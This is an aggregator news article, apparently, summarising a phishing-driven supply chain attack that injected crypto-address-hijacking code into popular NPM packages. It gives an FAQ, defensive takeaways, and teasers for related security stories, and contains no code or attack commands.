Loading
Yanuki
ARTICLE DETAIL
NPM Packages Hijacked in Large-Scale Supply Chain Attack | Drone Strikes on AWS: A Wake-Up Call for Cloud Resilience | Conduent Data Breach Balloons, Affecting Millions of Americans | Salesforce Data Breach Impacts Over 200 Companies Via Gainsight | Malicious VS Code Extension and NPM Packages Target Developers | SentinelOne’s AI Partnerships: Redefining Cloud Security? | SonicWall Blames State-Sponsored Hackers for September Security Breach | SesameOp: Novel Backdoor Uses OpenAI Assistants API for Command and Control | Conduent Data Breach Affects Millions: What You Need to Know | NPM Packages Hijacked in Large-Scale Supply Chain Attack | Drone Strikes on AWS: A Wake-Up Call for Cloud Resilience | Conduent Data Breach Balloons, Affecting Millions of Americans | Salesforce Data Breach Impacts Over 200 Companies Via Gainsight | Malicious VS Code Extension and NPM Packages Target Developers | SentinelOne’s AI Partnerships: Redefining Cloud Security? | SonicWall Blames State-Sponsored Hackers for September Security Breach | SesameOp: Novel Backdoor Uses OpenAI Assistants API for Command and Control | Conduent Data Breach Affects Millions: What You Need to Know

Security / Supply Chain

NPM Packages Hijacked in Large-Scale Supply Chain Attack

A large-scale supply chain attack has compromised NPM packages, impacting over 2.6 billion weekly downloads. Attackers injected malicious code into popular packages by compromising maintainer accounts through phishing, leading to the hijack...

NPM Attack Injects Crypto-Stealing Malware Into Core JavaScript Libraries
Share
X LinkedIn

npm
NPM Packages Hijacked in Large-Scale Supply Chain Attack Image via Cointelegraph

Key Insights

  • Attackers compromised NPM package maintainers via phishing emails impersonating npmjs.com.
  • Malicious code injected into packages acts as a browser-based interceptor, hijacking network traffic and application APIs.
  • The malware targets cryptocurrency addresses and transactions, redirecting them to attacker-controlled wallets.
  • Impacted packages include widely used libraries such as debug, chalk, and ansi-styles.
  • The attack highlights the increasing risk of supply chain attacks targeting JavaScript libraries.

In-Depth Analysis

Attackers used phishing emails threatening account locks to trick maintainers into updating their 2FA credentials via a malicious site. Once compromised, the attackers updated packages with code that injects itself into web browsers, monitoring for cryptocurrency transactions. The malware replaces destination wallet addresses with attacker-controlled ones, effectively hijacking funds. Aikido Security's analysis revealed the code operates at multiple layers, altering content, tampering with APIs, and manipulating user app interactions. This attack follows similar incidents, emphasizing the growing threat to the JavaScript ecosystem.

Read source article

FAQ

What is a supply chain attack?

A supply chain attack targets vulnerabilities in the software development and distribution process to compromise end-users.

How were the NPM packages compromised?

Attackers used phishing emails to steal maintainer credentials, allowing them to inject malicious code into the packages.

What is the impact of this attack?

The attack redirects cryptocurrency transactions to attacker-controlled wallets, resulting in financial losses for users.

Which packages were affected?

Affected packages include debug, chalk, ansi-styles, and others, collectively downloaded over 2.6 billion times weekly.

How can I protect myself from this type of attack?

Enable 2FA, be cautious of phishing emails, and regularly audit your dependencies for suspicious activity.

Takeaways

  • Verify the legitimacy of emails before clicking on links or entering credentials.
  • Enable two-factor authentication (2FA) on all accounts.
  • Regularly audit your project dependencies for any signs of compromise.
  • Monitor network traffic for suspicious activity related to cryptocurrency transactions.
  • Stay informed about the latest security threats and vulnerabilities.

Discussion

Do you think supply chain attacks will continue to increase? What steps can be taken to better secure the JavaScript ecosystem? Share this article with others who need to stay ahead of this trend!

Sources

NPM Attack Injects Crypto-Stealing Malware Into Core JavaScript Libraries s1ngularity's Aftermath: AI, TTPs, and Impact in the Nx Supply Chain Attack Hackers hijack npm packages with 2 billion weekly downloads in supply chain attack

Disclaimer

This article was compiled by Yanuki using publicly available data and trending information. The content may summarize or reference third-party sources that have not been independently verified. While we aim to provide timely and accurate insights, the information presented may be incomplete or outdated.

All content is provided for general informational purposes only and does not constitute financial, legal, or professional advice. Yanuki makes no representations or warranties regarding the reliability or completeness of the information.

This article may include links to external sources for further context. These links are provided for convenience only and do not imply endorsement.

Always do your own research (DYOR) before making any decisions based on the information presented.

Related Stories

Security / Outages

Drone Strikes on AWS: A Wake-Up Call for Cloud Resilience

Recent drone strikes on Amazon Web Services (AWS) data centers in the Middle East have exposed critical vulnerabilities in cloud infrastructure, prompting a reassessment of resilience strategies and security protocols.

Iranian drone strikes on Amazon data centers highlight tech’s exposure

Security / Data Breach

Conduent Data Breach Balloons, Affecting Millions of Americans

A significant data breach at Conduent, a government technology giant, has come to light, revealing that it affects millions more Americans than initially reported. The January 2025 ransomware attack, which severely disrupted Conduent's oper...

Data breach at govtech giant Conduent balloons, affecting millions more Americans

Security / Data Breach

Salesforce Data Breach Impacts Over 200 Companies Via Gainsight

A significant data breach has impacted over 200 companies using Salesforce, stemming from a vulnerability in apps published by Gainsight, a customer support platform provider. This supply chain attack highlights the increasing risks associa...

Salesforce says customer data possibly exposed following incident

Security / Malware

Malicious VS Code Extension and NPM Packages Target Developers

The software development ecosystem is facing increased threats from malicious actors. Recent incidents involve a VS Code extension with ransomware capabilities and NPM packages distributing information-stealing malware, highlighting the imp...

Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities

Security / Security Platforms

SentinelOne’s AI Partnerships: Redefining Cloud Security?

SentinelOne is strengthening its position in cloud security through strategic AI partnerships and innovative integrations. By focusing on agentic security and autonomous solutions, SentinelOne aims to streamline security operations and prov...

Will SentinelOne's (S) New AI Partnerships Redefine Its Competitive Edge in Cloud Security?

Security / Data Breach

SonicWall Blames State-Sponsored Hackers for September Security Breach

SonicWall has officially attributed the September security breach, which led to the unauthorized exposure of firewall configuration backup files, to state-sponsored threat actors. The company's investigation, conducted with Mandiant, conclu...

SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach

Security / Malware

SesameOp: Novel Backdoor Uses OpenAI Assistants API for Command and Control

Microsoft researchers have uncovered a new backdoor, dubbed SesameOp, that leverages the OpenAI Assistants API for command-and-control (C2) communications. This innovative approach allows threat actors to stealthily communicate and orchestr...

SesameOp: Novel backdoor uses OpenAI Assistants API for command and control

Security / Data Breach

Conduent Data Breach Affects Millions: What You Need to Know

In January 2025, business services provider Conduent experienced a significant data breach, potentially exposing the personal information of over 10 million individuals. This breach, traced back to unauthorized network access starting in Oc...

Millions hit by Conduent data breach impact, notices sent to affected users